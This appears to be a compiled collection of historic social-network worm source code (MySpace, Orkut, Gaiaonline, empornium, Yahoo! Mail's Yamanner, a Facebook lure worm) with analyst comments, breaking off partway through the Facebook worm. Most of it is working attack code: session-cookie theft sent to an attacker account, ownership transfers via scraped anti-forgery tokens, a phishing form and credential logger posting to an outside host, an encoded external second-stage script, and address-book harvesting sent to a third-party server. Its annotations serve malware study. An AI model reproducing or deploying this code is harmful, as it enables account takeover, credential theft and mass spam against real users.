+'<a href="'+lll+'login.html" target="" class="navbar">Blog</a> | <a href="'+lll+'login.html" target="" class="navbar">Favorites</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Forum</a> | <a href="'+lll+'login.html" target="" class="navbar">Groups</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Events</a> | <a href="'+lll+'login.html" target="" class="navbar">Videos</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Music</a> | <a href="'+lll+'login.html" target="" class="navbar">Comedy</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Classifieds</a></div></div>'; //profile
//This is the body of the message sent to other MySpace users. It contains a pornographic picture and a link to a pornographic website
//(the link is wrapped in a google.com/url?q= redirect, presumably so the message shows a google.com href)
cc[2]='<a href="http://google.com/url?q=http://www.vidchicks.com/home.php"><img border="0" src="http://img453.imageshack.us/img453/5603/youtubedt7rf2.jpg">'; //mesages
//This is HTML added to a profile with a link to the malicious Quicktime movie. It uses styles to try and hide itself from the user
//(1x1 px, overflow hidden, text pushed off-screen). The movie name is also what doEdit() searches for to detect re-infection.
cc[3]='<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed src='+lll+'piAF2iuswo.mov /></div>'; // profile inf


//========================================================
//======================================================== Code Execution Starts Here
//========================================================

//Please note that all variables declared here are global variables, as
//JavaScript does not have block level variable scope. This allows functions
//like doMessages() to access variables created here.

// Malware will execute only if variable editProf is not defined.
// Once the worm runs it defines this variable. This serves as a kill switch
// by preventing the virus from running multiple times on the same page
// Malware will execute only if variable editProf is not defined.
// Once the worm runs it defines this variable. This serves as a kill switch
// by preventing the virus from running multiple times on the same page.
// The `top == self` test also keeps it from running inside a frame - presumably so
// the MySpace pages loaded in the qtkt iframes below do not start another copy.
if((typeof editProf == "undefined") && (top == self)) {
	var ap=new Array(4);
	var fi=new Array(4);
    //This code picks 4 MySpace users at random and sets up code to
    //send them a message
	for(var x=0;x<ap.length;x++) {
	    //randomly generate a friend ID in the range 80,000,000 - 105,000,000
		var ran_unrounded=80000000+(105000000-80000000)*Math.random();
		var ran_number=Math.floor(ran_unrounded);
		fi[x]=ran_number;
        //build a hidden iFrame. This will be used to send a message to a MySpace user
		ap[x]=document.createElement('iframe');
		ap[x].height=1;
		ap[x].width=1;
		ap[x].name="qtkt"+x;
		ap[x].id="qtkt"+x;
		document.getElementsByTagName('body')[0].appendChild(ap[x]);
		//the compose-message page for that user, loaded with the victim's own session
		ap[x].src='http://profile.myspace.com/index.cfm?fuseaction=mail.message&friendID='+fi[x];
	}
    //In 6 seconds, execute the domessage() function. this will (try) to send messages to the randomly
    //selected people. (string-form setTimeout; a fixed delay rather than waiting for the iframes to load)	
	setTimeout("domessage()",6000);
    //create a new instance of XHconn. This also prevents the worm from running again on the same page
	var editProf = new XHConn();
    //Go fetch a the edit page for the user's profile and call the doEdit() function when you receive a response
	editProf.connect('http://'+document.location.host+'/Modules/ProfileEdit/Pages/Interests.aspx',"GET","",doEdit);
}

MySpace, QuickTime, QTL, MOV, GNUCITIZEN


The ORKUT Worm

A worm was spreading on Google's Orkut; analysis from Billy Hoffman. The code below runs inside the victim's session: it reads document.cookie, messages it to the hard-coded attacker uid, and then transfers ownership of every community the victim owns to that uid, re-using the victim's own POST_TOKEN and signature anti-forgery values scraped from the Scrapbook page.

// Hard-coded attacker profile id: the recipient of the stolen-cookie message and the
// account every owned community is transferred to.
var uid="6611314433566349528"; // Original comment (Portuguese): "Exploit written by Rodrigo Lacerda"
//window.alert('injetado'); // disabled debug alert ("injected")

function createXMLHttpRequest()
{
   // XHR factory, oldest API first: the two MSXML ActiveX objects, then the native
   // XMLHttpRequest. Returns null when none of them can be constructed.
   var factories = [
      function () { return new ActiveXObject("Msxml2.XMLHTTP"); },
      function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
      function () { return new XMLHttpRequest(); }
   ];
   for (var i = 0; i < factories.length; i++) {
      try {
         return factories[i]();
      } catch (e) {
         // not available in this environment; try the next one
      }
   }
   return null;
}

// Entry point (called immediately below). Captures document.cookie into the implicit
// globals `subject` / `dcookie` / `mensagem` that send_message() later posts to the
// attacker's uid, then starts the token-scraping / transfer chain via check_scraps().
function getCookies()
{
	subject="Orkut Cookie Exploit";
	dcookie=document.cookie;
	// 'state' is presumably the name of the session cookie being looked for.
	if(dcookie.indexOf('state') > -1)
	{
		// Message body: the cookies, then (Portuguese) "Check whether he sent any
		// community" and the author credit.
		mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
	}
	else
	{
		// (Portuguese) "This user uses Internet Explorer and the cookie-grabbing function
		// failed; check whether he sent any community" - i.e. the community transfer is
		// still attempted even when the cookie is not readable.
		mensagem = "Este usuario usa Internet Explorer e a funcao de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
	}
	check_scraps();
};
getCookies();

// Transfer ownership of the community cmm[x] to the attacker's uid, then recurse for
// the next index. POST and SIG are the victim's own anti-forgery values scraped by
// check_scraps(); since this runs in-origin, reading them is trivial. `send` and `x`
// are implicit globals.
function velocity_transfer()
{
	send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
	var xml= createXMLHttpRequest();
	xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
	xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
	// onreadystatechange is attached after send(); fine for an async request, since the
	// completion event fires later. The response body is read but never inspected.
	xml.send(send);xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlrtr=xml.responseText;
			x++;
			if(x<cmm.length)
			{
				velocity_transfer();
			}
		}
	};
};

// Fetch the victim's Communities page, pull the cmm= ids of the communities they own
// (the block between the ownedCommunities and pendingCommunities DIVs) into the global
// `cmm`, and start the transfers. A response containing 'textPanel' (presumably an
// interstitial/error page) is retried immediately, with no limit or delay.
function array_cmm()
{
	var xml2= createXMLHttpRequest();
	xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
	xml2.onreadystatechange=function()
	{
		if(xml2.readyState==4)
		{
			var xmlr=xml2.responseText;
			if(!xmlr.match(/textPanel/gi))
			{
				cont=xmlr;
				// Two spellings of the markup are handled (upper-case unquoted vs lower-case quoted).
				ini=cont.indexOf('<DIV id=ownedCommunities') > -1 ? cont.indexOf('<DIV id=ownedCommunities') : cont.indexOf('<div id="ownedCommunities"');
				fim=cont.indexOf('<DIV id=pendingCommunities') > -1 ? cont.indexOf('<DIV id=pendingCommunities') : cont.indexOf('<div id="pendingCommunities"');
				cont2=cont.substring(ini,fim)
				// With no match, String(null) is "null", so cmm becomes ["null"] and the
				// `if(cmm)` below is always true: one bogus transfer request is still sent.
				cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
				cmm=cmm.split(',');
				if(cmm)
				{
					velocity_transfer();
				}
			}
			else
			{
				array_cmm();
			};
		};
	};
	xml2.send(null);
};

// Send the captured cookies (global `mensagem`, built by getCookies) as an Orkut
// message to the attacker's uid via Compose.aspx, using the victim's scraped
// POST_TOKEN / signature. Retries on a 'textPanel' response, otherwise moves on to
// the community transfer. `subject` is concatenated without encoding.
function send_message()
{
	send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
	var xml= createXMLHttpRequest();
	xml.open('POST','http://www.orkut.com/Compose.aspx',true);
	xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
	xml.send(send);xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlrtr=xml.responseText;
			if(!xmlrtr.match(/textPanel/gi))
			{
				array_cmm();
			}
			else
			{
				send_message();
			}
		}
	};
};


// Scrape the anti-forgery values (signature, POST_TOKEN) out of the victim's own
// Scrapbook page into the globals SIG / POST, then send the cookie message.
// The relative URL "Scrapbook.aspx" is resolved against the page the script runs on.
function check_scraps()
{
	x=0;
	var xml=createXMLHttpRequest();
	xml.open("GET","Scrapbook.aspx",true);
	xml.onreadystatechange=function()
	{
		if(xml.readyState==4)
		{
			var xmlr1=xml.responseText;
			// Precedence bug: `!` binds before `>`, so this reads
			// (!indexOf(...)) > -1, i.e. (true|false) > -1, which is always true.
			// The retry branch below is therefore dead, and when the markers are
			// absent the .match(...)[1] accesses throw on null.
			if(!xmlr1.indexOf('textPanel') > -1)
			{
				SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
				POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
				send_message();
			}
			else
			{
				check_scraps();
			}
		};
	};
	xml.send(null);
};    

// Exploit escrito por Rodrigo Lacerda

ORKUT, Google


Gaiaonline Worm

On 4 January 2007, gaiaonline.com was hit by a worm. The two segments below are its phishing side: log.php receives the credentials posted by the fake form and immediately refreshes the victim back to the real site, and start.js holds the look-alike sign-in form (posting to log.php) that replaces the page's "content" div.

log.php

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php 
// Credential drop for the fake login form in start.js. The 0-second meta refresh
// above bounces the victim straight back to the real site, so the submission
// presumably looks like a failed login. As listed, only the username field is
// recorded - the posted password is never read - and the log is a plain text file
// next to this script, readable by anyone who can fetch it from the web root.
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
// (written verbatim; no escaping, and no newline of its own)
$stringData = $_POST["username"];
// Write string to file.
fwrite($fh, $stringData);
// Add a tilde followed by newline to divide each entry.
$stringData = "~\n";
fwrite($fh, $stringData);
fclose($fh);

?>

start.js

// Content to replace div "content" with: a copy of Gaia's sign-in box whose
// <form action> points at an attacker-controlled host (gaiaonli.site.com/log.php)
// instead of gaiaonline.com — the phishing half of this worm. All other
// assets (images, "forgot password" link) still reference gaiaonline.com so
// the box looks genuine.
var newContent = '<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">	<tr>	<td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td>	</tr>	<tr>		<td align="center"><img src="http://graphics4.gaiaonline.com/images/template/header/header_sign_in_large.gif" width="203" height="30"></td>	</tr>	<tr>		<td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td>	</tr></table><table width="721" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/table/border_top_stationary.gif" width="721" height="1"></td></tr></table><table width="721" border="0" cellspacing="0" cellpadding="5" background="http://graphics4.gaiaonline.com/images/template/bg/stationary.gif" align="center"><tr><td><table width="710" border="0" cellspacing="0" cellpadding="4"><form action="http://gaiaonli.site.com/log.php" method="post" target="_top" name="loginForm"><tr><td align="center"><span class="normbold">Username: </span><input type="text" name="username" size="25" maxlength="40" class="vendform" value="Anonymous" /></td></tr><tr><td align="center"><span class="normbold">Password: </span><input type="password" name="password" size="25" maxlength="25" class="vendform" /></td></tr><tr><td align="center"><span class="normbold">Log me on automatically each visit:</span><input type="checkbox" name="autologin"/></td></tr><tr><td align="center"><input type="hidden" name="sid" value="57181309749d15ca59db5332a46e673f" /><input type="hidden" name="redirect" value="" /><input type="submit" name="login" class="mainoption" value="Login" /></td></tr><tr><td align="center"><span class="normbold"><a href="/account/index.php?mode=sendpass" class="gensmall">I forgot my password</a></span></td></tr><tr><td align="center"><span class="normbold">Account activation problems? 
Click <A HREF="http://www.gaiaonline.com/info/feedback.php">here</A>.</span></td></tr></form></table></td></tr></table><table width="721" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/table/border_bottom_stationary.gif" width="721" height="1"></td></tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"><tr><td><img src="http://graphics4.gaiaonline.com/images/template/s.gif" width="1" height="15"></td></tr></table>';
//XSS vector: the community search page, whose `val` parameter is presumably
//reflected unescaped into the response (the injection point this worm relies on).
var spreadOne = "http://www.gaiaonline.com/community/search.php?val="

//Replace content with newContent — swaps the real page body for the fake
//login box above. Throws if no element with id "content" exists.
document.getElementById("content").innerHTML=newContent;


//Detect which method of XHR to use.
//(`var` inside try/catch is function/global-scoped, so xmlhttp, XMLHTTP_IDS,
//success and i all leak to the enclosing scope.)
      var xmlhttp;
      try {
          // Mozilla / Safari / IE7
          xmlhttp = new XMLHttpRequest();
      } catch (e) {
           // IE
           var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
                                     'MSXML2.XMLHTTP.4.0',
                                     'MSXML2.XMLHTTP.3.0',
                                     'MSXML2.XMLHTTP',
                                     'Microsoft.XMLHTTP' );
          var success = false;
          for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
              try {
                   xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
                      success = true;
                } catch (e) {}
          }
          if (!success) {
              throw new Error('Unable to create XMLHttpRequest.');
          }
     }

// URI to POST data to: the private-message endpoint, relative to the current
// origin, so the request rides on the victim's logged-in session.
var targetURI = "/profile/privmsg.php";
//Parameters to pass to targetURI. The message body is a BBCode link to
//spreadOne plus a percent-encoded string; decoded once it reads
//  "><script defer src=//viewfor.site.com/astart.js></script><style>
//i.e. a second-stage script loaded from an external host (this is the IoC
//worth keeping). escape() is applied to an already-encoded string, so every
//"%" becomes "%25" and the link carries a double-encoded payload.
//NOTE(review): "[email protected]" looks like an extraction artifact for the
//recipient parameter — confirm against the original sample.
var params = "[email protected]&subject=Check this out&folder=inbox&post=true&message=You should go check [url=" + spreadOne + escape('%22%3E%3Csc%72%69%70t%20defer%20%73%72%63%3D%2F/viewfor%2E%73%69%74%65%2E%63%6F%6D%2F%61%73%74%61%72%74%2E%6A%73%3E%3C/sc%72%69%70t%3E%3C%73%74%79%6C%65%3E') + "]this[/url] out.";

//Start XHR
xmlhttp.open("POST", targetURI, true);

//Set proper headers. (Content-length/Connection are set by the browser;
//setting them by hand is ignored or refused by modern XHR implementations.)
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");

// Send the parameters to the target. In this case, the "Check this out" PM.
// No readyState handler is installed, so success/failure is never observed.
xmlhttp.send(params);

Gaiaonline

.mario

empornium.us - AJAX Worm PoC

This worm stub can be placed in empornium.us torrent descriptions. It could be extended with a more malicious payload and spread through infected users' torrent descriptions. The worm never ran in the wild; the portal's admins were informed.

// CSRF proof-of-concept: as soon as the page has loaded, jQuery POSTs a
// profile edit that rides on the viewer's ambient session cookie. The fixed
// field values disable PMs and notifications, set a new avatar, replace the
// contact e-mail and set the password to "123456" — which would amount to an
// account takeover if takeprofedit.php accepts the request without an
// anti-CSRF token (the note above says it was reported, not run).
// NOTE(review): "[email protected]" is an extraction artifact; the original
// carried an attacker-chosen address in that parameter — confirm against the sample.
$(document).ready(function(){ 
	$.ajax({
  		type: 	"POST",
  		url: 	"http://empornium.us/takeprofedit.php",
  		data: 	"acceptpms=no&pmnotif=no&avatar=http://img150.imageshack.us/img150/3060/stallowned5wk.jpg&info=&[email protected]&chpassword=123456&passagain=123456",
 	 	success: function(msg){
   			alert( "Loading Complete..." ); // only visible side effect; msg is ignored
  		}
	});
 });

empornium, csrf, ajax

Sven Vetsch / Disenchant

Yamanner

Yamanner was a worm that exploited a vulnerability in the Yahoo! Mail service to send a copy of itself to other Yahoo! Mail contacts; it also captured the addresses in the address book of every infected user and uploaded them to a server. By doing so, it was building an email list of many thousands of names that could be sold to spammers.

// Shared state for the Yamanner sample. Every function below reads and writes
// these globals rather than passing values around.
var http_request = false; // the single XHR object reused by every makeRequest() call

var Email = ''; // first harvested address; used as the To: recipient in Getcrumb()

var IDList = ''; // comma-separated harvested addresses; Bcc list in Getcrumb(), exfiltrated in alertContents()

var CRumb = ''; // ".crumb" value scraped from the compose page by ExtractStr()



// Issues one request on the shared global http_request, replacing whatever
// request was previously in flight (the object is re-created on every call).
// url    - absolute URL to fetch
// Func   - callback meant to run on state changes
// Method - 'GET' or anything else (treated as POST with a body)
// Param  - request body; ignored for GET
// NOTE(review): "onfiltered" is not an XMLHttpRequest property. It looks like
// a filter or extraction artifact standing in for the readyState callback
// assignment — as shown, Func would never be invoked. Confirm against the
// original sample before relying on this listing for analysis.
function makeRequest(url, Func, Method, Param) {

	if (window.XMLHttpRequest) 

	{ 

		http_request = new XMLHttpRequest();

	} else if (window.ActiveXObject) 

	{ 

		http_request = new ActiveXObject('Microsoft.XMLHTTP'); 

	}

	

	http_request. onfiltered= Func;

	http_request.open(Method, url, true);

	

	if( Method == 'GET') http_request.send(null);

	else http_request.send(Param);

}



// Pops a new window to an external site; its purpose is not visible in this listing.
window.open('http://www.lastdata.com'); 

// Derive the Yahoo! Mail server name from the page URL: the text between
// "us." and ".mail" (e.g. the "f123" in us.f123.mail.yahoo.com — constructed
// example). Used below to build same-server request URLs.
// NOTE(review): url0 is not defined anywhere in this listing; presumably a
// global exposed by the Yahoo! Mail page — confirm. ServerUrl, USIndex,
// MailIndex and CutLen are all implicit globals.
ServerUrl = url0;USIndex = ServerUrl.indexOf('us.' ,0);

MailIndex = ServerUrl.indexOf('.mail' ,0);

CutLen = MailIndex - USIndex - 3;

var Server = ServerUrl.substr(USIndex + 3, CutLen); 



// Harvests Yahoo! addresses out of the raw HTML of the address-book page.
// Returns a comma-separated list with (a) the first address removed — it is
// kept in the global Email as the To: recipient — and (b) the victim's own
// addresses removed. Every variable here except the parameter is an implicit
// global, so the function also clobbers StartString/EndString/i/CutLen etc.
// NOTE(review): StartString/EndString are ' ' and '' in this listing. The HTML
// markers that delimited each address appear to have been stripped by
// extraction, so the loop as shown would not locate real addresses. Confirm
// against the original sample.
function GetIDs(HtmlContent) { 

	IDList = '';

	StartString = ' ';

	EndString = '';

	i = 0; // incremented per match but never read

	StartIndex = HtmlContent.indexOf(StartString, 0); 



	while(StartIndex >= 0) { 

		// Cut out the text between the start marker and the next end marker.
		EndIndex = HtmlContent.indexOf(EndString, StartIndex); 

		CutLen = EndIndex - StartIndex - StartString.length; 

		YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); 

	

		// Keep only yahoo.com / yahoogroups.com addresses.
		if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 0) > 0 ) IDList = IDList + ',' + YahooID ; 

		// Advance past the current entry in two staged searches (the second
		// marker is the one actually searched for on the next iteration).
		StartString = ''; 

		StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); 

		StartString = ' '; 

		StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); 

		i++; 

	} 



	// Drop the leading comma left by the accumulation above.
	if(IDList.substr(0,1) == ',') IDList = IDList.substr(1, IDList.length); 

	// First harvested address becomes the To: recipient; the rest stay in IDList (Bcc).
	if(IDList.indexOf(',', 0)>0 ) { 

		IDListArray = IDList.split(','); 

		Email = IDListArray[0]; 

		IDList = IDList.replace(Email + ',', ''); 

	} 

	// Remove the victim's own addresses so the mail is not sent back to them.
	// spamform.NE and showLetter.FromAddress are looked up by form/element
	// name on the Yahoo! Mail page — presumably the compose form and the
	// currently displayed letter; confirm. Each replace() removes only the
	// first occurrence.
	CurEmail = spamform.NE.value; 

	IDList = IDList.replace(CurEmail + ',', ''); 

	IDList = IDList.replace(',' + CurEmail, '');

	IDList = IDList.replace(CurEmail, '');

	UserEmail = showLetter.FromAddress.value;

	IDList = IDList.replace(',' + UserEmail, '');

	IDList = IDList.replace(UserEmail + ',', '');

	IDList = IDList.replace(UserEmail, ''); 

	return IDList; 

}



// Completion callback for the address-book fetch started at the bottom of
// this file. On a 200 response it harvests the addresses into the global
// IDList and then fetches the compose page so Getcrumb() can scrape the
// .crumb token. The random query parameter is presumably a cache-buster.
function ListContacts() {

	if (http_request.readyState == 4) {

		if (http_request.status == 200) { 

			HtmlContent = http_request.responseText;

			IDList = GetIDs(HtmlContent); 

			makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', null); 

		} 

	}

}



// Pulls the value of the hidden input named ".crumb" out of the compose-page
// HTML (\u0022 is a double quote, so the marker is: name=".crumb" value=").
// This looks like Yahoo! Mail's per-request token; it is sent back with the
// compose POST in Getcrumb(). All locals are implicit globals.
// NOTE(review): if the marker is absent, indexOf() returns -1 and the substr
// arithmetic silently yields an unrelated slice instead of failing.
function ExtractStr(HtmlContent) { 

	StartString = 'name=\u0022.crumb\u0022 value=\u0022'; 

	EndString = '\u0022'; 

	i = 0; // unused

	StartIndex = HtmlContent.indexOf(StartString, 0); 

	EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); 

	CutLen = EndIndex - StartIndex - StartString.length; 

	crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); 

	return crumb; 

}



// Completion callback for the compose-page fetch. Fills a template of the
// Yahoo! Mail compose form with: the scraped .crumb token, the message id and
// folder name parsed out of the page's compose form action, the harvested
// To/Bcc addresses and a fixed subject — then POSTs it via makeRequest() with
// alertContents() as the callback. The FwdFile/FwdMsg fields suggest the
// current (worm) message is forwarded as the body, which would be how the
// worm carries itself; confirm against the original.
function Getcrumb() { 

	if (http_request.readyState == 4) { 

		if (http_request.status == 200) { 

			HtmlContent = http_request.responseText; 

			CRumb = ExtractStr(HtmlContent); 

			MyBody = 'this is test'; // never reaches the template (see EMAILBODY below)

			MySubj = 'New Graphic Site'; 

			Url = 'http://us.' + Server + '.mail.yahoo.com/ym/Compose'; 

			// `compose` is a DOM lookup by form name — presumably the page's
			// compose <form>; confirm. Its action carries ?box=<folder>&Mid=<id>&inc...
			var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf('&Mid=' ,0);

			incIndex = ComposeAction.indexOf('&inc' ,0);

			CutLen = incIndex - MidIndex - 5;

			var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); 

			QIndex = ComposeAction.indexOf('?box=' ,0);

			AIndex = ComposeAction.indexOf('&Mid' ,0);

			CutLen = AIndex - QIndex - 5;

			var BoxName = ComposeAction.substr(QIndex + 5, CutLen); 

			// Template of the compose POST with UPPERCASE placeholders.
			Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel'; 

			// String.replace() with a string pattern replaces only the first
			// occurrence, hence the repeated EMAILSUBJ (x3) and EMAILMID (x2) calls.
			Param = Param.replace('BOXNAME', BoxName); 

			Param = Param.replace('RUMBVAL', CRumb); 

			Param = Param.replace('BCCLIST', IDList); 

			Param = Param.replace('TOEMAIL', Email);

			Param = Param.replace('FROMEMAIL', '[email protected]'); // "[email protected]" is an extraction artifact

			// EMAILBODY and PlainMESSAGE do not occur in the template above, so
			// these two replaces are no-ops.
			Param = Param.replace('EMAILBODY', MyBody); 

			Param = Param.replace('PlainMESSAGE', ''); 

			Param = Param.replace('EMAILSUBJ', MySubj);

			Param= Param.replace('EMAILSUBJ', MySubj);

			Param = Param.replace('EMAILSUBJ', MySubj); 

			Param = Param.replace('EMAILMID', MyMid);

			Param = Param.replace('EMAILMID', MyMid);

			makeRequest(Url , alertContents, 'POST', Param); 

		} 

	}

}



// Completion callback for the compose POST: the exfiltration step. It
// navigates the window to a third-party host with the harvested address list
// appended as BCCList. The long Yahoo!-Mail-looking path before it is
// presumably cosmetic. window.navigate is IE-only. The response status is not
// checked, so this runs whether or not the mail was sent.
function alertContents() { 

	if (http_request.readyState == 4) { 

		window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=' + IDList) 

	}

}



// Entry point: request the address-book builder page (parameters appear to
// ask for up to 100 addresses from the last 180 days) and hand the HTML to
// ListContacts. The chain is ListContacts → Getcrumb → alertContents.
makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)

Yahoo!, mail

pdp

Osama FaceBook worm

No description for this entry.
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

/**
 * Looks up a cookie by name in document.cookie.
 * Each "key=value" chunk is split on ';', leading spaces (only spaces) are
 * stripped, and the first chunk that begins with `name=` wins.
 * @param {string} name - cookie name to look up
 * @returns {string|null} the raw value after "name=", or null when absent
 */
function readCookie(name) {
	const prefix = name + "=";
	for (const rawChunk of document.cookie.split(';')) {
		const chunk = rawChunk.replace(/^ +/, '');
		if (chunk.startsWith(prefix)) {
			return chunk.slice(prefix.length);
		}
	}
	return null;
}

var user_id = readCookie("c_user"); // the victim's Facebook user id, read from the c_user cookie


// Setup some variables

// Per-page request tokens read from hidden form fields; both are attached to
// every request below so Facebook accepts them as user-initiated.
// Each line throws if the named field is absent from the page.
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

// Chat message variables 

// Four copies of the same URL, so the "random" pick below always yields it.
var linkies = [
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down"
]

var this_chat = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)]; // lure text + link
var prepared_chat = encodeURIComponent(this_chat); // URL-encoded once for the chat POST body


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Wall-post propagation: fetch the victim's friend list, then POST a link
// attachment to the wall of up to 400 friends, one XHR per friend with no
// throttling. All of it rides on the victim's ambient session.
var token = Math.round(new Date().getTime() / 1000); // Unix seconds

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
// NOTE(review): url1 already has a query string, so this appends a second,
// empty "?" to the URL ("...friends_only?").
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

	if(http1.readyState == 4 && http1.status == 200) { // If state = success
		
		var response1 = http1.responseText;
		
		response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
		response1 = JSON.parse(response1); // Convert the response to JSON
		
		//alert(response4.toSource());
		
		var count = 0;
		
		// Iterates the keys of payload.entries but indexes by `count`, so this
		// only lines up if entries is an array; `uid` (implicit global) is unused.
		for(uid in response1.payload.entries){
			
			if(count < 400){
				
				//alert("SENT TO "+response1.payload.entries[count].uid);

				// Loop to send messages
			
				// New XMLHttp object
				var httpwp = new XMLHttpRequest();
							
				var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
				
				var statusmessage="Disturbing Yet Awesome!";
				var title="Bin Laden EXECUTION Video! Yes it's REAL!";
				var link=linkies[Math.floor(Math.random()*linkies.length)];
				var description="Commandos attack Bin Laden's compund and take him out!";
				var picture="http://i.imgur.com/yTjtU.jpg";
				
				// Composer POST targeting this friend's uid with a pre-built
				// link-attachment (og:* metadata supplied by the sender, so the
				// preview is whatever the script claims). title/description/link
				// are not URL-encoded, and there is a stray ")" after both
				// statusmessage insertions. The favicon parameter points at an
				// external host (an IoC for this sample).
